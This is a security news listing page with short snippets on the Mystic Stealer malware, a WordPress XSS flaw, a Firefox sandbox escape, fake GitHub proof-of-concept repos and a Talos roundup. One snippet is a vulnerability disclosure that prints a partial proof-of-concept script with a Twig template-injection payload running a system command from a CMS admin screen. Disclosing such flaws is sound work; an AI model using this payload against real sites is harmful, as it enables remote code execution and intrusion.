Tag
A new information-stealing malware called Mystic Stealer has been found to steal data from about 40 different web browsers and over 70 web browser extensions. First advertised on April 25, 2023, for $150 per month, the malware also targets cryptocurrency wallets, Steam, and Telegram, and employs extensive mechanisms to resist analysis. "The code is heavily obfuscated making use of polymorphic
Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Alain Gonzalez Google Map Shortcode plugin <= 3.1.2 versions.
The Google Map Shortcode WordPress plugin through 3.1.2 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin
A compromised child process could have injected XBL Bindings into privileged CSS rules, resulting in arbitrary code execution and a sandbox escape. This vulnerability affects Firefox < 70.
The AI era promises a flood of disinformation, deepfakes, and hallucinated “facts.” Psychologists are only beginning to grapple with the implications.
By Waqas According to researchers, these fake accounts on GitHub and Twitter are spreading malware that infects both Windows- and Linux-based systems. This is a post from HackRead.com Read the original post: Warning: Fake GitHub Repos Delivering Malware as PoCs
Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 9 and June 16. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key
This new role of safeguarding cloud deployments requires an exceedingly rare set of technical and soft skills.
### Summary I found an RCE(Remote Code Execution) by SSTI in the admin screen. ### Details Remote Code Execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges. ### PoC 1. Log in to the administrator screen and access the edit screen of the default page "Typography". (`http://127.0.0.1:8000/admin/pages/typography`) 2. Open the browser's console screen and execute the following JavaScript code to confirm that an arbitrary command (`id`) is being executed. ```js (async () => { const nonce = document.querySelector("input[name=admin-nonce]").value; const id = document.querySelector("input[name=__unique_form_id__]").value; const payload = "{{['id']|map('system')|join}}"; // SSTI Payload const params = new URLSearchParams(); params.append("task", "save"); params.append("data[header][title]", "poc"); params.append("data[content]", payload); params.append("data[folder]", "poc"); params.append("data[route]", "...
Mobile users in the Middle East and Africa often download moneylending apps that ask for excessive permissions — an all too common issue in an area where mobile-only is the norm and cyber awareness is low.